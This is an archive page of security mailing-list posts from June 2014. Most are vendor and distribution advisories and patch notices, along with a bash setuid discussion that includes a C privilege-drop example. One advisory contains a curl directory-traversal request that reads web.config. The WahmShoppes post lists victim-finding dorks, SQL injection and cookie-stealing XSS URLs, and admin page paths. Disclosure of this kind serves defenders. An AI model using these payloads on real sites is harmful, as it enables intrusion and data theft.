ESA-2014-024: EMC Documentum Digital Asset Manager Blind DQL Injection Vulnerability

2014-06-05 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2014-024: EMC Documentum Digital Asset Manager Blind DQL Injection 
Vulnerability

EMC Identifier: ESA-2014-024 

CVE Identifier: CVE-2014-2503

Severity Rating: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Affected products:  

•   EMC Documentum Digital Asset Manager 6.5 SP3
•   EMC Documentum Digital Asset Manager 6.5 SP4
•   EMC Documentum Digital Asset Manager 6.5 SP5
•   EMC Documentum Digital Asset Manager 6.5 SP6


Summary: 

EMC Documentum Digital Asset Manager (DAM) announces a security fix to address 
a Blind DQL (Documentum Query Language) Injection vulnerability. 

Details:  

The DAM thumbnail proxy server allows unauthenticated users to query objects 
using a vulnerable URL query string parameter. A malicious attacker can 
potentially conduct Blind DQL injection attacks using the vulnerable parameter 
to infer or modify the database contents.

Resolution: 
   
Customers using EMC DAM 6.5 SP3, 6.5 SP4 and 6.5 SP5 should apply the hotfix 
from the link given under “Link to remedies”.

Customers using EMC DAM 6.5 SP6 should upgrade to 6.5 SP6 P13 and later as this 
contains the resolution for this issue.

EMC strongly recommends all customers apply the hotfix or upgrade at the 
earliest opportunity.  

Link to remedies:

•   The hotfix for EMC DAM 6.5 SP3, 6.5 SP4 and 6.5 SP5 can be downloaded 
from:
https://emc.subscribenet.com/control/dctm/download?element=3888781
File Name: DQL_Injection_with_DAM_Proxy_Server_HotFix.zip. 
Installation instructions are available in the zip file.
•   EMC DAM 6.5 SP6 P13 and later can be downloaded from:
https://emc.subscribenet.com/control/dctm/download?element=4772311



Read and use the information in this EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact EMC Software 
Technical Support at 1-877-534-2867.

Product Security Response Center [security_al...@emc.com]


[SECURITY] [DSA 2947-1] libav security update

2014-06-05 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2947-1                   secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
June 04, 2014                                         http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: libav
CVE ID : not available

Several security issues have been corrected in multiple demuxers and 
decoders of the libav multimedia library. A full list of the changes is 
available at 
http://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v0.8.12

For the stable distribution (wheezy), this problem has been fixed in
version 0.8.12-1.

For the testing distribution (jessie), this problem has been fixed in
version 6:10.1-1.

For the unstable distribution (sid), this problem has been fixed in
version 6:10.1-1.

We recommend that you upgrade your libav packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2948-1] python-bottle security update

2014-06-05 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2948-1                   secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
June 04, 2014                                         http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: python-bottle
CVE ID : CVE-2014-3137

It was discovered that Bottle, a WSGI framework for Python, performed
a too permissive detection of JSON content, resulting in a potential
bypass of security mechanisms.

For the stable distribution (wheezy), this problem has been fixed in
version 0.10.11-1+deb7u1.

For the testing distribution (jessie), this problem has been fixed in
version 0.12.6-1.

For the unstable distribution (sid), this problem has been fixed in
version 0.12.6-1.

We recommend that you upgrade your python-bottle packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2946-1] python-gnupg security update

2014-06-05 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2946-1                   secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
June 04, 2014                                         http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: python-gnupg
CVE ID : CVE-2013-7323 CVE-2014-1927 CVE-2014-1928 CVE-2014-1929

Multiple vulnerabilities were discovered in the Python wrapper for the 
GNU Privacy Guard (GPG). Insufficient sanitising could lead to the 
execution of arbitrary shell commands.

For the stable distribution (wheezy), these problems have been fixed in
version 0.3.6-1~deb7u1.

For the testing distribution (jessie), these problems have been fixed in
version 0.3.6-1.

For the unstable distribution (sid), these problems have been fixed in
version 0.3.6-1.

We recommend that you upgrade your python-gnupg packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[security bulletin] HPSBMU03033 rev.3 - HP Insight Control Software Components running OpenSSL, Remote Disclosure of Information

2014-06-05 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04272892

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04272892
Version: 3

HPSBMU03033 rev.3 - HP Insight Control Software Components running OpenSSL,
Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-30
Last Updated: 2014-06-02

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Insight
Control software components running OpenSSL. This is the OpenSSL
vulnerability known as Heartbleed which could be exploited remotely
resulting in disclosure of information.

Note: additional information regarding the OpenSSL Heartbleed vulnerability
concerning HP Servers products is available at the following HP Customer
Notice:

https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04239413

References: CVE-2014-0160, SSRT101550

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control impacted software component products and versions

HP Insight Control 7.2.x and 7.3.x

HP Systems Insight Manager v7.2, v7.2.1, v7.2.2, v7.3, and v7.3.1 bundled
with the following software:

HP Smart Update Manager (SUM) v6.0.0 through v6.3.0
HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,
v7.3.1 for Linux and Windows
WMI Mapper for HP Systems Insight Manager v7.2.0, v7.2.1, v7.2.2, v7.3, and
v7.3.1
HP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for
Windows
HP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux
HP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,
and v7.3.1 for Windows

HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,
v7.3.1 for Linux and Windows

HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2

HP Insight Control server migration v7.3 and v7.3.1

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference         Base Vector                    Base Score
  CVE-2014-0160     (AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===========================================================
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has addressed this vulnerability for the impacted HP Insight Control
software components in the following software updates and security bulletins.

HP Insight Control 7.2.x installations

HP Systems Insight Manager 7.2 hotfix available at the following
location:

http://h18013.www1.hp.com/products/servers/management/hpsim/download.html

Note: This installer updates HP SIM, SMH, WMI Mapper, and VCA/VCRM.

HP Insight Control 7.3 and 7.3u1 installations

HP Insight Management 7.3.0a available at the following location:

  http://www.hp.com/go/insightupdates

Note: This installer updates HP SIM, SMH, WMI Mapper, VCA/VCRM, and
Insight Control server migration.

Please check the following security bulletins for each of these and the
additional HP products.

HP Insight Control software component / HP Security Bulletin / Security Bulletin Location

HP Systems Insight Manager (SIM)
  HPSBMU03022
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04263236

HP Smart Update Manager (SUM)
  HPSBMU02997
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04239375

HP System Management Homepage (SMH)
  HPSBMU02998
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04239372

WMI Mapper for HP Systems Insight Manager
  HPSBMU03013
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04260385

HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM)
on Linux and Windows
  HPSBMU03020
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04262472

HP Insight Control server deployment
  HPSBMU03024
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04267749

HP Insight Control server migration
  HPSBMU03029
  https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04268240

HISTORY
Version:1 (rev.1) - 30 April 2014 Initial release
Version:2 (rev.2) - 2 May 2014 Added information for HP Insight Control
server migration
Version:3 (rev.3) - 2 June 2014 Updated solution information

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about 

Re: [FD] [oss-security] Bug in bash <= 4.3 [security feature bypassed]

2014-06-05 Thread Hector Marco


On 04/06/14 11:13, Jose Carlos Luna Duran wrote:

> In my opinion the drop of privs in bash was mostly a help measure
> for poorly written setuid programs executing system() calls. I don't
> think it is the role of bash to do this, as the problem that could be
> exploited by that would really be in the original program that does
> not drop privs before invoking the shell. This has been known for some
> time in some circles at least, but as I said the problem would really
> be in the non-priv-dropping privileged program, that's why most people
> did not really care that much. Last year there was a vuln that is very
> much related to this subject:
> http://blog.cmpxchg8b.com/2013/08/security-debianisms.html

We already knew that this bug was known by the Bash developers.

> Correct me if I'm wrong, but even in that case there is another help
> measure that has been implemented at least in linux kernels >= 3.1:
> http://lxr.free-electrons.com/source/kernel/sys.c?v=3.1#L628
>
> Therefore setuid calls do not fail anymore even in the case of
> existing resource limits for processes (in linux).

You can still exploit this in the 2.6.x Linux kernel. The 2.6.x versions
are still in widespread use. (Red Hat Enterprise Linux version 6.5, released
a short time ago, is based on version 2.6.32. Possibly Red Hat changed the
RLIMIT_NPROC behavior, but there are other 2.6.x-based Linux distributions 
also.)

> But in any case, for the sake of correctness I agree that the
> drop_priv code should be fixed (or just completely removed...).

I agree, but if finally they decide to remove the code it would seem
to be a consequence of the disclosure. Right now it makes more sense to fix
the bug. This is because this vulnerability (thanks to the help measure in
the kernel) is more difficult to exploit. So, the drop privilege code
makes more sense nowadays than when it was initially coded.

> 2014-06-03 16:16 GMT+02:00 Hector Marco hecma...@upv.es:
>
>> Hi everyone,
>>
>> Recently we discovered a bug in bash. Some time after reporting
>> it to the bash developers, it has not been fixed.
>>
>> We think that this is a security issue because in some circumstances
>> the bash security feature could be bypassed, allowing bash to be a
>> valid target shell in an attack.
>>
>> We strongly recommend patching your bash code.
>>
>> Why not fix this bug by simply adding a mandatory if clause?
>> Any comments about this issue are welcomed.
>>
>> Details at:
>> http://hmarco.org/bugs/bash_4.3-setuid-bug.html
>>
>> Thank you,
>>
>> Hector Marco
>> http://hmarco.org







Re: [FD] [oss-security] Bug in bash <= 4.3 [security feature bypassed]

2014-06-05 Thread lists
Jose Carlos Luna Duran writes:

> In my opinion the drop of privs in bash was mostly a help measure
> for poorly written setuid programs executing system() calls. I don't
> think it is the role of bash to do this ...

True, but it is a slight help and I'm in favour of keeping it.

> Correct me if I'm wrong, but even in that case there is another help
> measure that has been implemented at least in linux kernels >= 3.1:
> http://lxr.free-electrons.com/source/kernel/sys.c?v=3.1#L628

For permanent dropping of privilege I suggest calling setgid() and
setuid() to the desired values *twice* (and ignore the return code).
Then try to reset to the original values (should fail; ignore return code).

Then test that the real and effective values are the same and are the
ones you want - that's the result that indicates success in this case.
And exit() if failed.

That's the simple usage guide - David Wagner has written at length on
the technicalities.


Re: Bug in bash <= 4.3 [security feature bypassed]

2014-06-05 Thread Daryl Tester

On 03/06/14 23:46, Hector Marco wrote:

> Recently we discovered a bug in bash. Some time after reporting
> it to the bash developers, it has not been fixed.

...

> Any comments about this issue are welcomed.
>
> Details at:
> http://hmarco.org/bugs/bash_4.3-setuid-bug.html


I'm only going by the patch presented above, so ...

1.  The program should be calling setgid() before setuid() (which is
another common class of security mistake).

2.  Why is exit() returning values greater than 255?  It's not capable
of doing that under (most) Unix environments.

--
Regards,
 Daryl Tester
 Handcrafted Computers Pty. Ltd.
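
The recipe in the reply above (setgid() and setuid() each called twice, return codes ignored, an attempt to climb back, then a check of the resulting real and effective IDs) together with Daryl Tester's ordering point, written out as an added example in C; this is not code from either post or from bash, and the names drop_privileges and ids_match are my own.

```c
/* Added example, not from the thread: a permanent privilege drop that
 * trusts only the resulting process state, never the return codes of
 * setgid()/setuid(). The bash bug discussed above is a setuid() whose
 * failure went unnoticed; checking the IDs afterwards closes that gap. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if the real and effective user and group IDs all equal the
 * requested values, 0 otherwise. This is the only success signal used. */
int ids_match(uid_t uid, gid_t gid)
{
    return getuid() == uid && geteuid() == uid &&
           getgid() == gid && getegid() == gid;
}

/* Drop to (uid, gid) permanently. Returns 0 on success and -1 when the
 * process cannot be shown to be running as exactly those IDs afterwards. */
int drop_privileges(uid_t uid, gid_t gid)
{
    uid_t orig_uid = geteuid();
    gid_t orig_gid = getegid();
    int rc;

    /* Group first: once the UID is no longer privileged, setgid() to an
     * arbitrary group could not succeed any more (Daryl Tester's point). */
    rc = setgid(gid);
    rc = setgid(gid);
    rc = setuid(uid);
    rc = setuid(uid);

    /* Try to regain the original IDs. If the drop was permanent this must
     * fail; the return code is deliberately ignored and the state inspected. */
    rc = setgid(orig_gid);
    rc = setuid(orig_uid);
    (void)rc; /* return codes are not trusted, by design */

    /* A non-permanent drop (saved IDs still privileged) shows up here as the
     * climb-back having succeeded, so the IDs no longer match. */
    if (!ids_match(uid, gid))
        return -1;
    return 0;
}

int main(void)
{
    /* Stand-alone demo: dropping to the caller's own IDs is always allowed;
     * dropping to any other IDs is only possible when started as root. */
    if (drop_privileges(getuid(), getgid()) != 0) {
        fprintf(stderr, "privilege drop could not be verified, exiting\n");
        exit(EXIT_FAILURE);
    }
    printf("running as uid=%u gid=%u\n",
           (unsigned)geteuid(), (unsigned)getegid());
    return 0;
}
```

On Linux, getresuid()/getresgid() additionally expose the saved IDs and let the check be made stricter; the POSIX calls above are what is portable.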


[RT-SA-2014-006] Directory Traversal in DevExpress ASP.NET File Manager

2014-06-05 Thread RedTeam Pentesting GmbH
Advisory: Directory Traversal in DevExpress ASP.NET File Manager

During a penetration test RedTeam Pentesting discovered a directory
traversal vulnerability in DevExpress' ASP.NET File Manager and File
Upload. Attackers are able to read arbitrary files by specifying a
relative path.

Details
=======

Product: DevExpress ASPxFileManager Control for WebForms and MVC
Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8
Fixed Versions: DevExpress ASPxFileManager v13.2.9
Vulnerability Type: Directory Traversal
Security Risk: high
Vendor URL:
https://www.devexpress.com/Products/NET/Controls/ASP/File-Upload-Explorer/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006
Advisory Status: published
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575


Introduction
============

The DevExpress ASP.NET Subscription includes a standalone Multi-File
Upload Manager for WebForms and MVC and a pre-built File Manager for
WebForms; built so you can instantly introduce file management
capabilities in your next web application.

(from DevExpress' Homepage)


More Details
============

The ASPX File Manager component is prone to a directory traversal
vulnerability. Attackers with access to the File Manager component can
read arbitrary files on the same partition as the shared directory.

A common request to download a file via the File Manager component
requires multiple HTTP-Post parameters:

__EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1
__EVENTARGUMENT=13%7Cfile.ext
__EVENTVALID=

The parameter __EVENTARGUMENT=13|file.ext specifies a file download
and the file which is to be downloaded. Attackers may also request files
outside of the shared directory by prepending a relative path to a
parent directory.


Proof of Concept
================

By requesting files with a relative path, files otherwise not available
will be accessible through the File Manager component.  Depending on the
shared directory and the webserver configuration, the webserver
configuration file might for example be accessible through the File
Manager component:

__EVENTARGUMENT=13|../../web.config

Other sensitive operating system files could be affected, too.

Example exploit:

curl --data "__EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1&\
__EVENTARGUMENT=13%7C../../web.config&__EVENTVALID=" \
http://example.com/FileManagerComponent.aspx


The request above will download the specified file.


Workaround
==========

Instead of a physical file system provider, a database file system
provider with limited access permissions could be used.


Fix
===

Update ASPxFileManager control to DevExpress libraries version v13.2.9.


Security Risk
=============

The risk is estimated to be high. This vulnerability allows attackers to
access arbitrary files on the same partition as the File Manager's root
directory. This may allow attackers to read sensitive information like
the webserver configuration.


Timeline
========

2014-03-10 Vulnerability identified
2014-03-21 Customer approved disclosure to vendor
2014-03-21 CVE number requested and assigned
2014-03-25 Vendor notified
2014-04-11 Customer opened support ticket with vendor
2014-04-17 Vendor released fixed version
2014-04-17 Vendor released security advisory to customers
2014-06-05 Advisory released


References
==========

Vendor Security Advisory:
http://security.devexpress.com/de7c4756/?id=ff8c1703126f4717993ac3608a65a2e2


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests and short pentests,
performed by a team of specialised IT-security experts. In this way, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH                       Tel.: +49 241 510081-0
Dennewartstr. 25-27                           Fax : +49 241 510081-99
52068 Aachen                                  https://www.redteam-pentesting.de
Germany                                       Registergericht: Aachen HRB 14004
Geschäftsführer:                              Patrick Hof, Jens Liebchen




[SECURITY] [DSA 2950-1] openssl security update

2014-06-05 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2950-1                   secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
June 05, 2014                                         http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: openssl
CVE ID : CVE-2014-0195 CVE-2014-0221 CVE-2014-0224 CVE-2014-3470

Multiple vulnerabilities have been discovered in OpenSSL:

CVE-2014-0195

Jueri Aedla discovered that a buffer overflow in processing DTLS
fragments could lead to the execution of arbitrary code or denial
of service.

CVE-2014-0221

Imre Rad discovered the processing of DTLS hello packets is 
susceptible to denial of service.

CVE-2014-0224

KIKUCHI Masashi discovered that carefully crafted handshakes can
force the use of weak keys, resulting in potential man-in-the-middle
attacks.

CVE-2014-3470

Felix Groebert and Ivan Fratric discovered that the implementation of
anonymous ECDH ciphersuites is susceptible to denial of service.

Additional information can be found at 
http://www.openssl.org/news/secadv_20140605.txt

For the stable distribution (wheezy), these problems have been fixed in
version 1.0.1e-2+deb7u10. All applications linked to openssl need to
be restarted. You can use the tool checkrestart from the package
debian-goodies to detect affected programs, or reboot your system. There is
also a forthcoming security update for the Linux kernel later today
(CVE-2014-3153), so you need to reboot anyway. Perfect timing, isn't it?

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your openssl packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2949-1] linux security update

2014-06-05 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2949-1                   secur...@debian.org
http://www.debian.org/security/                       Salvatore Bonaccorso
June 05, 2014                                         http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: linux
CVE ID : CVE-2014-3144 CVE-2014-3145 CVE-2014-3153

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a denial of service or privilege escalation:

CVE-2014-3144 / CVE-2014-3145

A local user can cause a denial of service (system crash) via
crafted BPF instructions.

CVE-2014-3153

Pinkie Pie discovered an issue in the futex subsystem that allows a
local user to gain ring 0 control via the futex syscall. An
unprivileged user could use this flaw to crash the kernel (resulting
in denial of service) or for privilege escalation.

For the stable distribution (wheezy), these problems have been fixed in
version 3.2.57-3+deb7u2.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your linux packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



FreeBSD Security Advisory FreeBSD-SA-14:14.openssl

2014-06-05 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-14:14.openssl                                    Security Advisory
                                                          The FreeBSD Project

Topic:  OpenSSL multiple vulnerabilities

Category:   contrib
Module: openssl
Announced:  2014-06-05
Affects:All supported versions of FreeBSD.
Corrected:  2014-06-05 12:32:38 UTC (stable/10, 10.0-STABLE)
2014-06-05 12:33:23 UTC (releng/10.0, 10.0-RELEASE-p5)
2014-06-05 12:53:06 UTC (stable/9, 9.3-BETA1)
2014-06-05 12:53:06 UTC (stable/9, 9.3-BETA1-p2)
2014-06-05 12:33:23 UTC (releng/9.2, 9.2-RELEASE-p8)
2014-06-05 12:33:23 UTC (releng/9.1, 9.1-RELEASE-p15)
2014-06-05 12:32:38 UTC (stable/8, 8.4-STABLE)
2014-06-05 12:33:23 UTC (releng/8.4, 8.4-RELEASE-p12)
CVE Name:   CVE-2014-0195, CVE-2014-0221, CVE-2014-0224, CVE-2014-3470

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

FreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.

II.  Problem Description

Receipt of an invalid DTLS fragment on an OpenSSL DTLS client or server can
lead to a buffer overrun. [CVE-2014-0195]

Receipt of an invalid DTLS handshake on an OpenSSL DTLS client can lead the
code to recurse unnecessarily.  [CVE-2014-0221]

Carefully crafted handshake can force the use of weak keying material in
OpenSSL SSL/TLS clients and servers. [CVE-2014-0224]

Carefully crafted packets can lead to a NULL pointer dereference in OpenSSL
TLS client code if anonymous ECDH ciphersuites are enabled. [CVE-2014-3470]

III. Impact

A remote attacker may be able to run arbitrary code on a vulnerable client
or server by sending invalid DTLS fragments to an OpenSSL DTLS client or
server. [CVE-2014-0195]

A remote attacker who can send an invalid DTLS handshake to an OpenSSL DTLS
client can crash the remote OpenSSL DTLS client. [CVE-2014-0221]

A remote attacker who can send a carefully crafted handshake can force the
use of weak keying material between a vulnerable client and a vulnerable
server and decrypt and/or modify traffic from the attacked client and
server in a man-in-the-middle (MITM) attack. [CVE-2014-0224]

A remote attacker who can send carefully crafted packets can cause OpenSSL
TLS client to crash.  [CVE-2014-3470]

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.0]
# fetch http://security.FreeBSD.org/patches/SA-14:14/openssl-10.patch
# fetch http://security.FreeBSD.org/patches/SA-14:14/openssl-10.patch.asc
# gpg --verify openssl-10.patch.asc

[FreeBSD 9.x and 8.x]
# fetch http://security.FreeBSD.org/patches/SA-14:14/openssl-9.patch
# fetch http://security.FreeBSD.org/patches/SA-14:14/openssl-9.patch.asc
# gpg --verify openssl-9.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:http://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons using the library, or reboot the system.

3) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/8/ r267103
releng/8.4/   r267104
stable/9/ r267106
releng/9.1/   r267104
releng/9.2/   r267104
stable/10/  

multiple Vulnerability in WahmShoppes eStore

2014-06-05 Thread cseye_ut
#+
# Title : multiple Vulnerability in WahmShoppes eStore
# Author : alieye
# vendor : http://www.wahmshoppes.com/
# Contact : cseye...@yahoo.com
# Risk : High
# Class: Remote
# Google Dork: 
# inurl:WsError.asp 
# inurl:store/ We apologize but your request rendered no results
# Version: all version
# Date: 05/06/2014
#

1-Blind SQL Injection

http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc
-

2-Cross Site Scripting

http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
-

3-Information Disclosure in image location

http://victim.com/store/thumb.asp?path=X:/server path and domain 
name/example.jpg 
-

4-show admin panel tools

http://victim.com/store/frmLeft.asp
-

Admin page

http://victim.com/store/admin/Default.asp

#
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and 
all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#


ESA-2014-046: EMC Documentum Content Server Multiple Vulnerabilities

2014-06-05 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


ESA-2014-046: EMC Documentum Content Server Multiple Vulnerabilities

EMC Identifier: ESA-2014-046

CVE Identifier:  CVE-2014-2506, CVE-2014-2507, CVE-2014-2508

Severity Rating: CVSS v2 Base Score: See below for individual scores

Affected products:  
•   All EMC Documentum Content Server versions of 7.1
•   All EMC Documentum Content Server versions of 7.0
•   All EMC Documentum Content Server versions of 6.7 SP2
•   All EMC Documentum Content Server versions of 6.7 SP1
•   All EMC Documentum Content Server versions prior to 6.7 SP1

Summary:  
EMC Documentum Content Server contains fixes for multiple security 
vulnerabilities that could be potentially exploited by malicious users to 
compromise the affected system. 

Details: 
EMC Documentum Content Server may be susceptible to the following 
vulnerabilities:

•   Privilege Escalation  (CVE-2014-2506):
Authenticated non-privileged users are allowed to create system objects with 
super user privileges due to improper authorization checks being performed on 
these objects. This could be potentially exploited by a malicious attacker to 
gain unauthorized access to data or to perform unauthorized actions on Content 
Server.
CVSS v2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)

•   Shell Injection (CVE-2014-2507):
Certain methods in Documentum Content Server perform improper validation checks 
on input arguments. This may be potentially exploited by an authenticated 
malicious user to conduct shell injection attacks against these methods and 
perform unauthorized actions on Content Server.
CVSS v2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)

•   DQL Injection (CVE-2014-2508):
Certain DQL hints in Documentum Content Server may be potentially exploited by 
an authenticated malicious user to conduct DQL injection attacks and perform 
unauthorized database actions.
CVSS v2 Base Score: 7.5 (AV:N/AC:M/Au:S/C:C/I:P/A:P)


Resolution: 
The following versions contain the security fixes to address these 
vulnerabilities: 
•   EMC Documentum Content Server version 7.1 P05 and later
•   EMC Documentum Content Server version 7.0 P15 and later
•   EMC Documentum Content Server version 6.7 SP2 P14 and later
•   EMC Documentum Content Server version 6.7 SP1 P28 and later

EMC strongly recommends that all customers upgrade to one of the above versions 
at the earliest opportunity.

Link to remedies:

Registered EMC Online Support customers can download patches and software from 
support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server


Credits: EMC would like to thank Pedro Laguna from Pentura for reporting the 
issue CVE-2014-2508.




For an explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends that all customers take into account both the base 
score and any relevant temporal and environmental scores which may affect the 
potential severity associated with a particular security vulnerability.

EMC Corporation distributes EMC Security Advisories in order to bring important 
security information to the attention of users of the affected EMC products. 
EMC recommends that all users determine the applicability of this information 
to their individual situations and take appropriate action. The information set 
forth herein is provided as is without warranty of any kind. EMC disclaims all 
warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement. 
In no event shall EMC or its suppliers be liable for any damages whatsoever, 
including direct, indirect, incidental, consequential, loss of business profits 
or special damages, even if EMC or its suppliers have been advised of the 
possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages, so the 
foregoing limitation may not apply.


Product Security Response Center
security_al...@emc.com 






[security bulletin] HPSBMU03029 rev.2 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information

2014-06-05 Thread security-alert

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04268240

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04268240
Version: 2

HPSBMU03029 rev.2 - HP Insight Control Server Migration running OpenSSL,
Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-30
Last Updated: 2014-06-02

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Insight
